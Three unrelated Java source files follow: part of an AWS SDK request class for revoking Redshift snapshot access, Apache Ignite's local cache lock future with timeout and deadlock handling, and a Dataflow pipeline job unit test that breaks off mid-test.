* resource element that specifies anything other than * for the cluster
* name.
* </p>
*/
private String snapshotClusterIdentifier;
/**
* <p>
* The identifier of the AWS customer account that can no longer restore the
* specified snapshot.
* </p>
*/
private String accountWithRestoreAccess;
/**
* <p>
* The identifier of the snapshot that the account can no longer access.
* </p>
*
* @param snapshotIdentifier
* The identifier of the snapshot that the account can no longer
* access.
*/
public void setSnapshotIdentifier(String snapshotIdentifier) {
this.snapshotIdentifier = snapshotIdentifier;
}
/**
* <p>
* The identifier of the snapshot that the account can no longer access.
* </p>
*
* @return The identifier of the snapshot that the account can no longer
* access.
*/
public String getSnapshotIdentifier() {
return this.snapshotIdentifier;
}
/**
* <p>
* The identifier of the snapshot that the account can no longer access.
* </p>
*
* @param snapshotIdentifier
* The identifier of the snapshot that the account can no longer
* access.
* @return Returns a reference to this object so that method calls can be
* chained together.
*/
public RevokeSnapshotAccessRequest withSnapshotIdentifier(
String snapshotIdentifier) {
setSnapshotIdentifier(snapshotIdentifier);
return this;
}
/**
* <p>
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a snapshot
* resource element that specifies anything other than * for the cluster
* name.
* </p>
*
* @param snapshotClusterIdentifier
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a
* snapshot resource element that specifies anything other than * for
* the cluster name.
*/
public void setSnapshotClusterIdentifier(String snapshotClusterIdentifier) {
this.snapshotClusterIdentifier = snapshotClusterIdentifier;
}
/**
* <p>
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a snapshot
* resource element that specifies anything other than * for the cluster
* name.
* </p>
*
* @return The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a
* snapshot resource element that specifies anything other than *
* for the cluster name.
*/
public String getSnapshotClusterIdentifier() {
return this.snapshotClusterIdentifier;
}
/**
* <p>
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a snapshot
* resource element that specifies anything other than * for the cluster
* name.
* </p>
*
* @param snapshotClusterIdentifier
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a
* snapshot resource element that specifies anything other than * for
* the cluster name.
* @return Returns a reference to this object so that method calls can be
* chained together.
*/
public RevokeSnapshotAccessRequest withSnapshotClusterIdentifier(
String snapshotClusterIdentifier) {
setSnapshotClusterIdentifier(snapshotClusterIdentifier);
return this;
}
/**
* <p>
* The identifier of the AWS customer account that can no longer restore the
* specified snapshot.
* </p>
*
* @param accountWithRestoreAccess
* The identifier of the AWS customer account that can no longer
* restore the specified snapshot.
*/
public void setAccountWithRestoreAccess(String accountWithRestoreAccess) {
this.accountWithRestoreAccess = accountWithRestoreAccess;
}
/**
* <p>
* The identifier of the AWS customer account that can no longer restore the
* specified snapshot.
* </p>
*
* @return The identifier of the AWS customer account that can no longer
* restore the specified snapshot.
*/
public String getAccountWithRestoreAccess() {
return this.accountWithRestoreAccess;
}
/**
* <p>
* The identifier of the AWS customer account that can no longer restore the
* specified snapshot.
* </p>
*
* @param accountWithRestoreAccess
* The identifier of the AWS customer account that can no longer
* restore the specified snapshot.
* @return Returns a reference to this object so that method calls can be
* chained together.
*/
public RevokeSnapshotAccessRequest withAccountWithRestoreAccess(
String accountWithRestoreAccess) {
setAccountWithRestoreAccess(accountWithRestoreAccess);
return this;
}
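    /**
     * Illustrative sketch (not part of the generated SDK class): the fluent
     * "with" setters chain into a single expression. All identifiers are
     * hypothetical.
     */
    private static RevokeSnapshotAccessRequest exampleBuildRequest() {
        return new RevokeSnapshotAccessRequest()
            .withSnapshotIdentifier("my-snapshot-id")
            .withSnapshotClusterIdentifier("my-cluster")
            .withAccountWithRestoreAccess("444455556666");
    }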
/**
* Returns a string representation of this object; useful for testing and
* debugging.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
if (getSnapshotIdentifier() != null)
sb.append("SnapshotIdentifier: " + getSnapshotIdentifier() + ",");
if (getSnapshotClusterIdentifier() != null)
sb.append("SnapshotClusterIdentifier: "
+ getSnapshotClusterIdentifier() + ",");
if (getAccountWithRestoreAccess() != null)
sb.append("AccountWithRestoreAccess: "
+ getAccountWithRestoreAccess());
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof RevokeSnapshotAccessRequest == false)
return false;
RevokeSnapshotAccessRequest other = (RevokeSnapshotAccessRequest) obj;
if (other.getSnapshotIdentifier() == null
^ this.getSnapshotIdentifier() == null)
return false;
if (other.getSnapshotIdentifier() != null
&& other.getSnapshotIdentifier().equals(
this.getSnapshotIdentifier()) == false)
return false;
if (other.getSnapshotClusterIdentifier() == null
^ this.getSnapshotClusterIdentifier() == null)
return false;
if (other.getSnapshotClusterIdentifier() != null
&& other.getSnapshotClusterIdentifier().equals(
this.getSnapshotClusterIdentifier()) == false)
return false;
if (other.getAccountWithRestoreAccess() == null
^ this.getAccountWithRestoreAccess() == null)
return false;
if (other.getAccountWithRestoreAccess() != null
&& other.getAccountWithRestoreAccess().equals(
this.getAccountWithRestoreAccess()) == false)
return false;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
hashCode = prime
* hashCode
+ ((getSnapshotIdentifier() == null) ? 0
: getSnapshotIdentifier().hashCode());
hashCode = prime
* hashCode
+ ((getSnapshotClusterIdentifier() == null) ? 0
: getSnapshotClusterIdentifier().hashCode());
hashCode = prime
* hashCode
+ ((getAccountWithRestoreAccess() == null) ? 0
: getAccountWithRestoreAccess().hashCode());
return hashCode;
}
@Override
public RevokeSnapshotAccessRequest clone() {
return (RevokeSnapshotAccessRequest) super.clone();
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.ignite.internal.processors.cache.local;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.UUID;
import java.util.concurrent.atomic.AtomicReference;
import java.util.concurrent.atomic.AtomicReferenceFieldUpdater;
import org.apache.ignite.IgniteCheckedException;
import org.apache.ignite.IgniteLogger;
import org.apache.ignite.internal.IgniteInternalFuture;
import org.apache.ignite.internal.processors.cache.CacheEntryPredicate;
import org.apache.ignite.internal.processors.cache.GridCacheContext;
import org.apache.ignite.internal.processors.cache.GridCacheEntryEx;
import org.apache.ignite.internal.processors.cache.GridCacheEntryRemovedException;
import org.apache.ignite.internal.processors.cache.GridCacheFutureAdapter;
import org.apache.ignite.internal.processors.cache.GridCacheMvccCandidate;
import org.apache.ignite.internal.processors.cache.GridCacheVersionedFuture;
import org.apache.ignite.internal.processors.cache.KeyCacheObject;
import org.apache.ignite.internal.processors.cache.transactions.IgniteTxKey;
import org.apache.ignite.internal.processors.cache.transactions.IgniteTxLocalEx;
import org.apache.ignite.internal.processors.cache.transactions.TxDeadlock;
import org.apache.ignite.internal.processors.cache.version.GridCacheVersion;
import org.apache.ignite.internal.processors.timeout.GridTimeoutObjectAdapter;
import org.apache.ignite.internal.transactions.IgniteTxTimeoutCheckedException;
import org.apache.ignite.internal.util.tostring.GridToStringExclude;
import org.apache.ignite.internal.util.tostring.GridToStringInclude;
import org.apache.ignite.internal.util.typedef.F;
import org.apache.ignite.internal.util.typedef.internal.S;
import org.apache.ignite.internal.util.typedef.internal.U;
import org.apache.ignite.lang.IgniteInClosure;
import org.apache.ignite.lang.IgniteUuid;
import org.apache.ignite.transactions.TransactionDeadlockException;
import org.jetbrains.annotations.Nullable;
/**
* Cache lock future.
*/
public final class GridLocalLockFuture<K, V> extends GridCacheFutureAdapter<Boolean>
implements GridCacheVersionedFuture<Boolean> {
/** Logger reference. */
private static final AtomicReference<IgniteLogger> logRef = new AtomicReference<>();
/** Error updater. */
private static final AtomicReferenceFieldUpdater<GridLocalLockFuture, Throwable> ERR_UPD =
AtomicReferenceFieldUpdater.newUpdater(GridLocalLockFuture.class, Throwable.class, "err");
/** Logger. */
private static IgniteLogger log;
/** Cache registry. */
@GridToStringExclude
private GridCacheContext<K, V> cctx;
/** Underlying cache. */
@GridToStringExclude
private GridLocalCache<K, V> cache;
/** Lock owner thread. */
@GridToStringInclude
private long threadId;
    /**
     * Keys locked so far.
     *
     * The thread that created this object iterates over the entries and tries to lock each of them.
     * If it finds an entry already locked by another thread, it registers a callback which will be
     * executed by the thread owning that lock.
     *
     * Thus access to this collection must be synchronized, except while this object
     * is still local to the thread that created it.
     */
@GridToStringExclude
private List<GridLocalCacheEntry> entries;
/** Future ID. */
private IgniteUuid futId;
/** Lock version. */
private GridCacheVersion lockVer;
/** Error. */
@SuppressWarnings("UnusedDeclaration")
private volatile Throwable err;
/** Timeout object. */
@GridToStringExclude
private LockTimeoutObject timeoutObj;
/** Lock timeout. */
private final long timeout;
/** Filter. */
private CacheEntryPredicate[] filter;
/** Transaction. */
private IgniteTxLocalEx tx;
/** Trackable flag. */
private boolean trackable = true;
/**
* @param cctx Registry.
* @param keys Keys to lock.
* @param tx Transaction.
* @param cache Underlying cache.
* @param timeout Lock acquisition timeout.
* @param filter Filter.
*/
GridLocalLockFuture(
GridCacheContext<K, V> cctx,
Collection<KeyCacheObject> keys,
IgniteTxLocalEx tx,
GridLocalCache<K, V> cache,
long timeout,
CacheEntryPredicate[] filter) {
assert keys != null;
assert cache != null;
assert (tx != null && timeout >= 0) || tx == null;
this.cctx = cctx;
this.cache = cache;
this.timeout = timeout;
this.filter = filter;
this.tx = tx;
ignoreInterrupts();
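        // When locking inside a transaction, reuse the transaction's thread id and xid version;
        // otherwise lock on behalf of the current thread with a freshly generated lock version.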
threadId = tx == null ? Thread.currentThread().getId() : tx.threadId();
lockVer = tx != null ? tx.xidVersion() : cctx.versions().next();
futId = IgniteUuid.randomUuid();
entries = new ArrayList<>(keys.size());
if (log == null)
log = U.logger(cctx.kernalContext(), logRef, GridLocalLockFuture.class);
}
/**
* @param keys Keys.
* @return {@code False} in case of error.
* @throws IgniteCheckedException If failed.
*/
public boolean addEntries(Collection<KeyCacheObject> keys) throws IgniteCheckedException {
for (KeyCacheObject key : keys) {
while (true) {
GridLocalCacheEntry entry = null;
try {
entry = cache.entryExx(key);
entry.unswap(false);
if (!cctx.isAll(entry, filter)) {
onFailed();
return false;
}
// Removed exception may be thrown here.
GridCacheMvccCandidate cand = addEntry(entry);
if (cand == null && isDone())
return false;
break;
}
catch (GridCacheEntryRemovedException ignored) {
if (log.isDebugEnabled())
log.debug("Got removed entry in lockAsync(..) method (will retry): " + entry);
}
}
}
if (timeout > 0) {
timeoutObj = new LockTimeoutObject();
cctx.time().addTimeoutObject(timeoutObj);
}
return true;
}
/** {@inheritDoc} */
@Override public IgniteUuid futureId() {
return futId;
}
/** {@inheritDoc} */
@Override public GridCacheVersion version() {
return lockVer;
}
/** {@inheritDoc} */
@Override public boolean onNodeLeft(UUID nodeId) {
return false;
}
/** {@inheritDoc} */
@Override public boolean trackable() {
return trackable;
}
/** {@inheritDoc} */
@Override public void markNotTrackable() {
trackable = false;
}
/**
* @return Entries.
*/
private List<GridLocalCacheEntry> entries() {
return entries;
}
/**
* @return {@code True} if transaction is not {@code null}.
*/
private boolean inTx() {
return tx != null;
}
/**
* @return {@code True} if implicit transaction.
*/
private boolean implicitSingle() {
return tx != null && tx.implicitSingle();
}
/**
* @param cached Entry.
* @return {@code True} if locked.
* @throws GridCacheEntryRemovedException If removed.
*/
private boolean locked(GridCacheEntryEx cached) throws GridCacheEntryRemovedException {
// Reentry-aware check.
return (cached.lockedLocally(lockVer) || (cached.lockedByThread(threadId))) &&
filter(cached); // If filter failed, lock is failed.
}
/**
* Adds entry to future.
*
* @param entry Entry to add.
* @return Lock candidate.
* @throws GridCacheEntryRemovedException If entry was removed.
*/
private @Nullable GridCacheMvccCandidate addEntry(GridLocalCacheEntry entry)
throws GridCacheEntryRemovedException {
// Add local lock first, as it may throw GridCacheEntryRemovedException.
GridCacheMvccCandidate c = entry.addLocal(
threadId,
lockVer,
null,
null,
timeout,
!inTx(),
inTx(),
implicitSingle(),
false
);
entries.add(entry);
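        // With a negative timeout, failing to obtain the lock right away (null candidate)
        // aborts the future immediately instead of waiting.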
if (c == null && timeout < 0) {
if (log.isDebugEnabled())
log.debug("Failed to acquire lock with negative timeout: " + entry);
onFailed();
return null;
}
if (c != null) {
// Immediately set lock to ready.
entry.readyLocal(c);
}
return c;
}
/**
* Undoes all locks.
*/
private void undoLocks() {
Collection<GridLocalCacheEntry> entriesCp = entriesCopy();
for (GridLocalCacheEntry e : entriesCp) {
try {
e.removeLock(lockVer);
}
catch (GridCacheEntryRemovedException ignore) {
if (log.isDebugEnabled())
log.debug("Got removed entry while undoing locks: " + e);
}
}
}
/**
     * The need for synchronization here is explained in the comment on the {@link GridLocalLockFuture#entries} field.
*
* @return Copy of entries collection.
*/
private synchronized Collection<GridLocalCacheEntry> entriesCopy() {
return new ArrayList<>(entries());
}
/**
*
*/
void onFailed() {
undoLocks();
onComplete(false);
}
/**
* @param t Error.
*/
void onError(Throwable t) {
if (ERR_UPD.compareAndSet(this, null, t))
onFailed();
}
/**
* @param cached Entry to check.
* @return {@code True} if filter passed.
*/
private boolean filter(GridCacheEntryEx cached) {
try {
if (!cctx.isAll(cached, filter)) {
if (log.isDebugEnabled())
log.debug("Filter didn't pass for entry (will fail lock): " + cached);
onFailed();
return false;
}
return true;
}
catch (IgniteCheckedException e) {
onError(e);
return false;
}
}
/**
* Explicitly check if lock was acquired.
*/
void checkLocks() {
if (!isDone()) {
for (int i = 0; i < entries.size(); i++) {
while (true) {
GridCacheEntryEx cached = entries.get(i);
try {
if (!locked(cached))
return;
break;
}
// Possible in concurrent cases, when owner is changed after locks
// have been released or cancelled.
catch (GridCacheEntryRemovedException ignore) {
if (log.isDebugEnabled())
log.debug("Got removed entry in onOwnerChanged method (will retry): " + cached);
// Replace old entry with new one.
entries.add(i, (GridLocalCacheEntry)cache.entryEx(cached.key()));
}
}
}
if (log.isDebugEnabled())
log.debug("Local lock acquired for entries: " + entries);
onComplete(true);
}
}
/** {@inheritDoc} */
@Override public boolean onOwnerChanged(GridCacheEntryEx entry, GridCacheMvccCandidate owner) {
if (!isDone()) {
for (int i = 0; i < entries.size(); i++) {
while (true) {
GridCacheEntryEx cached = entries.get(i);
try {
if (!locked(cached))
return true;
break;
}
// Possible in concurrent cases, when owner is changed after locks
// have been released or cancelled.
catch (GridCacheEntryRemovedException ignore) {
if (log.isDebugEnabled())
log.debug("Got removed entry in onOwnerChanged method (will retry): " + cached);
// Replace old entry with new one.
entries.add(i, (GridLocalCacheEntry)cache.entryEx(cached.key()));
}
}
}
if (log.isDebugEnabled())
log.debug("Local lock acquired for entries: " + entries);
onComplete(true);
}
return false;
}
/** {@inheritDoc} */
@SuppressWarnings({"ThrowableInstanceNeverThrown"})
@Override public boolean cancel() {
if (onCancelled()) {
// Remove all locks.
undoLocks();
onComplete(false);
}
return isCancelled();
}
/**
* Completeness callback.
*
* @param success If {@code true}, then lock has been acquired.
*/
private void onComplete(boolean success) {
if (!success)
undoLocks();
if (onDone(success, err)) {
if (log.isDebugEnabled())
log.debug("Completing future: " + this);
cache.onFutureDone(this);
if (timeoutObj != null)
cctx.time().removeTimeoutObject(timeoutObj);
}
}
/** {@inheritDoc} */
@Override public String toString() {
return S.toString(GridLocalLockFuture.class, this);
}
/**
* Lock request timeout object.
*/
private class LockTimeoutObject extends GridTimeoutObjectAdapter {
/**
* Default constructor.
*/
LockTimeoutObject() {
super(timeout);
}
/** {@inheritDoc} */
@SuppressWarnings({"ThrowableInstanceNeverThrown", "ForLoopReplaceableByForEach"})
@Override public void onTimeout() {
if (log.isDebugEnabled())
log.debug("Timed out waiting for lock response: " + this);
if (inTx() && cctx.tm().deadlockDetectionEnabled()) {
Set<IgniteTxKey> keys = new HashSet<>();
List<GridLocalCacheEntry> entries = entries();
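                // Collect keys whose first local candidate is an owner belonging to a different
                // transaction; these keys seed the deadlock detection request below.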
for (int i = 0; i < entries.size(); i++) {
GridLocalCacheEntry e = entries.get(i);
List<GridCacheMvccCandidate> mvcc = e.mvccAllLocal();
if (mvcc == null)
continue;
GridCacheMvccCandidate cand = mvcc.get(0);
if (cand.owner() && cand.tx() && !cand.version().equals(tx.xidVersion()))
keys.add(e.txKey());
}
IgniteInternalFuture<TxDeadlock> fut = cctx.tm().detectDeadlock(tx, keys);
fut.listen(new IgniteInClosure<IgniteInternalFuture<TxDeadlock>>() {
@Override public void apply(IgniteInternalFuture<TxDeadlock> fut) {
try {
TxDeadlock deadlock = fut.get();
if (deadlock != null)
ERR_UPD.compareAndSet(GridLocalLockFuture.this, null,
new IgniteTxTimeoutCheckedException("Failed to acquire lock within provided timeout for " +
"transaction [timeout=" + tx.timeout() + ", tx=" + tx + ']',
new TransactionDeadlockException(deadlock.toString(cctx.shared()))));
}
catch (IgniteCheckedException e) {
U.warn(log, "Failed to detect deadlock.", e);
ERR_UPD.compareAndSet(GridLocalLockFuture.this, null, e);
}
onComplete(false);
}
});
}
else
onComplete(false);
}
/** {@inheritDoc} */
@Override public String toString() {
return S.toString(LockTimeoutObject.class, this);
}
}
}
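// A minimal, self-contained sketch (not part of Ignite) of the "first error wins" pattern used
// above via ERR_UPD: a static AtomicReferenceFieldUpdater over a volatile field records only the
// first failure and ignores later ones. The class and field names here are illustrative only.
import java.util.concurrent.atomic.AtomicReferenceFieldUpdater;

final class FirstErrorHolder {
    private static final AtomicReferenceFieldUpdater<FirstErrorHolder, Throwable> ERR_UPD =
        AtomicReferenceFieldUpdater.newUpdater(FirstErrorHolder.class, Throwable.class, "err");

    /** Must be a volatile, non-static field for the field updater to accept it. */
    private volatile Throwable err;

    /** Records {@code t} only if no error has been recorded yet; returns {@code true} on success. */
    boolean recordFirstError(Throwable t) {
        return ERR_UPD.compareAndSet(this, null, t);
    }

    Throwable firstError() {
        return err;
    }
}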
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.cloud.dataflow.sdk.runners;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.allOf;
import static org.hamcrest.Matchers.contains;
import static org.hamcrest.Matchers.containsInAnyOrder;
import static org.hamcrest.Matchers.empty;
import static org.hamcrest.Matchers.equalTo;
import static org.hamcrest.Matchers.greaterThanOrEqualTo;
import static org.hamcrest.Matchers.hasEntry;
import static org.hamcrest.Matchers.is;
import static org.hamcrest.Matchers.lessThanOrEqualTo;
import static org.junit.Assert.assertEquals;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;
import com.google.api.services.dataflow.Dataflow;
import com.google.api.services.dataflow.Dataflow.Projects.Jobs.Get;
import com.google.api.services.dataflow.Dataflow.Projects.Jobs.GetMetrics;
import com.google.api.services.dataflow.Dataflow.Projects.Jobs.Messages;
import com.google.api.services.dataflow.model.Job;
import com.google.api.services.dataflow.model.JobMetrics;
import com.google.api.services.dataflow.model.MetricStructuredName;
import com.google.api.services.dataflow.model.MetricUpdate;
import com.google.cloud.dataflow.sdk.PipelineResult.State;
import com.google.cloud.dataflow.sdk.runners.dataflow.DataflowAggregatorTransforms;
import com.google.cloud.dataflow.sdk.testing.FastNanoClockAndSleeper;
import com.google.cloud.dataflow.sdk.transforms.Aggregator;
import com.google.cloud.dataflow.sdk.transforms.AppliedPTransform;
import com.google.cloud.dataflow.sdk.transforms.Combine.CombineFn;
import com.google.cloud.dataflow.sdk.transforms.PTransform;
import com.google.cloud.dataflow.sdk.transforms.Sum;
import com.google.cloud.dataflow.sdk.util.AttemptBoundedExponentialBackOff;
import com.google.cloud.dataflow.sdk.util.MonitoringUtil;
import com.google.cloud.dataflow.sdk.values.PInput;
import com.google.cloud.dataflow.sdk.values.POutput;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.ImmutableSetMultimap;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
import org.junit.runner.RunWith;
import org.junit.runners.JUnit4;
import org.mockito.Mock;
import org.mockito.MockitoAnnotations;
import java.io.IOException;
import java.math.BigDecimal;
import java.net.SocketTimeoutException;
import java.util.concurrent.TimeUnit;
/**
* Tests for DataflowPipelineJob.
*/
@RunWith(JUnit4.class)
public class DataflowPipelineJobTest {
private static final String PROJECT_ID = "someProject";
private static final String JOB_ID = "1234";
@Mock
private Dataflow mockWorkflowClient;
@Mock
private Dataflow.Projects mockProjects;
@Mock
private Dataflow.Projects.Jobs mockJobs;
@Rule
public FastNanoClockAndSleeper fastClock = new FastNanoClockAndSleeper();
@Rule
public ExpectedException thrown = ExpectedException.none();
@Before
public void setup() {
MockitoAnnotations.initMocks(this);
when(mockWorkflowClient.projects()).thenReturn(mockProjects);
when(mockProjects.jobs()).thenReturn(mockJobs);
}
/**
   * Validates that a given time is a valid total time slept by an
   * AttemptBoundedExponentialBackOff, given the number of retries and
   * an initial polling interval.
   *
   * @param pollingIntervalMillis The initial polling interval given.
   * @param attempts The number of attempts made.
* @param timeSleptMillis The amount of time slept by the clock. This is checked
* against the valid interval.
*/
void checkValidInterval(long pollingIntervalMillis, int attempts, long timeSleptMillis) {
long highSum = 0;
long lowSum = 0;
for (int i = 1; i < attempts; i++) {
double currentInterval =
pollingIntervalMillis
* Math.pow(AttemptBoundedExponentialBackOff.DEFAULT_MULTIPLIER, i - 1);
double offset =
AttemptBoundedExponentialBackOff.DEFAULT_RANDOMIZATION_FACTOR * currentInterval;
highSum += Math.round(currentInterval + offset);
lowSum += Math.round(currentInterval - offset);
}
assertThat(timeSleptMillis, allOf(greaterThanOrEqualTo(lowSum), lessThanOrEqualTo(highSum)));
}
@Test
public void testWaitToFinishMessagesFail() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
Job statusResponse = new Job();
statusResponse.setCurrentState("JOB_STATE_" + State.DONE.name());
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenReturn(statusResponse);
MonitoringUtil.JobMessagesHandler jobHandler = mock(MonitoringUtil.JobMessagesHandler.class);
Dataflow.Projects.Jobs.Messages mockMessages =
mock(Dataflow.Projects.Jobs.Messages.class);
Messages.List listRequest = mock(Dataflow.Projects.Jobs.Messages.List.class);
when(mockJobs.messages()).thenReturn(mockMessages);
when(mockMessages.list(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(listRequest);
when(listRequest.execute()).thenThrow(SocketTimeoutException.class);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
State state = job.waitToFinish(5, TimeUnit.MINUTES, jobHandler, fastClock, fastClock);
assertEquals(null, state);
}
public State mockWaitToFinishInState(State state) throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
Job statusResponse = new Job();
statusResponse.setCurrentState("JOB_STATE_" + state.name());
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenReturn(statusResponse);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
return job.waitToFinish(1, TimeUnit.MINUTES, null, fastClock, fastClock);
}
/**
* Tests that the {@link DataflowPipelineJob} understands that the {@link State#DONE DONE}
* state is terminal.
*/
@Test
public void testWaitToFinishDone() throws Exception {
assertEquals(State.DONE, mockWaitToFinishInState(State.DONE));
}
/**
* Tests that the {@link DataflowPipelineJob} understands that the {@link State#FAILED FAILED}
* state is terminal.
*/
@Test
public void testWaitToFinishFailed() throws Exception {
assertEquals(State.FAILED, mockWaitToFinishInState(State.FAILED));
}
/**
   * Tests that the {@link DataflowPipelineJob} understands that the {@link State#CANCELLED CANCELLED}
   * state is terminal.
*/
@Test
public void testWaitToFinishCancelled() throws Exception {
assertEquals(State.CANCELLED, mockWaitToFinishInState(State.CANCELLED));
}
/**
   * Tests that the {@link DataflowPipelineJob} understands that the {@link State#UPDATED UPDATED}
   * state is terminal.
*/
@Test
public void testWaitToFinishUpdated() throws Exception {
assertEquals(State.UPDATED, mockWaitToFinishInState(State.UPDATED));
}
@Test
public void testWaitToFinishFail() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenThrow(IOException.class);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
long startTime = fastClock.nanoTime();
State state = job.waitToFinish(5, TimeUnit.MINUTES, null, fastClock, fastClock);
assertEquals(null, state);
long timeDiff = TimeUnit.NANOSECONDS.toMillis(fastClock.nanoTime() - startTime);
checkValidInterval(DataflowPipelineJob.MESSAGES_POLLING_INTERVAL,
DataflowPipelineJob.MESSAGES_POLLING_ATTEMPTS, timeDiff);
}
@Test
public void testWaitToFinishTimeFail() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenThrow(IOException.class);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
long startTime = fastClock.nanoTime();
State state = job.waitToFinish(4, TimeUnit.MILLISECONDS, null, fastClock, fastClock);
assertEquals(null, state);
long timeDiff = TimeUnit.NANOSECONDS.toMillis(fastClock.nanoTime() - startTime);
// Should only sleep for the 4 ms remaining.
    assertEquals(4L, timeDiff);
}
@Test
public void testGetStateReturnsServiceState() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
Job statusResponse = new Job();
statusResponse.setCurrentState("JOB_STATE_" + State.RUNNING.name());
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenReturn(statusResponse);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
assertEquals(
State.RUNNING,
job.getStateWithRetries(DataflowPipelineJob.STATUS_POLLING_ATTEMPTS, fastClock));
}
@Test
public void testGetStateWithExceptionReturnsUnknown() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenThrow(IOException.class);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
long startTime = fastClock.nanoTime();
assertEquals(
State.UNKNOWN,
job.getStateWithRetries(DataflowPipelineJob.STATUS_POLLING_ATTEMPTS, fastClock));
long timeDiff = TimeUnit.NANOSECONDS.toMillis(fastClock.nanoTime() - startTime);
checkValidInterval(DataflowPipelineJob.STATUS_POLLING_INTERVAL,
DataflowPipelineJob.STATUS_POLLING_ATTEMPTS, timeDiff);
}
@Test
public void testGetAggregatorValuesWithNoMetricUpdatesReturnsEmptyValue()
throws IOException, AggregatorRetrievalException {
Aggregator<?, ?> aggregator = mock(Aggregator.class);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
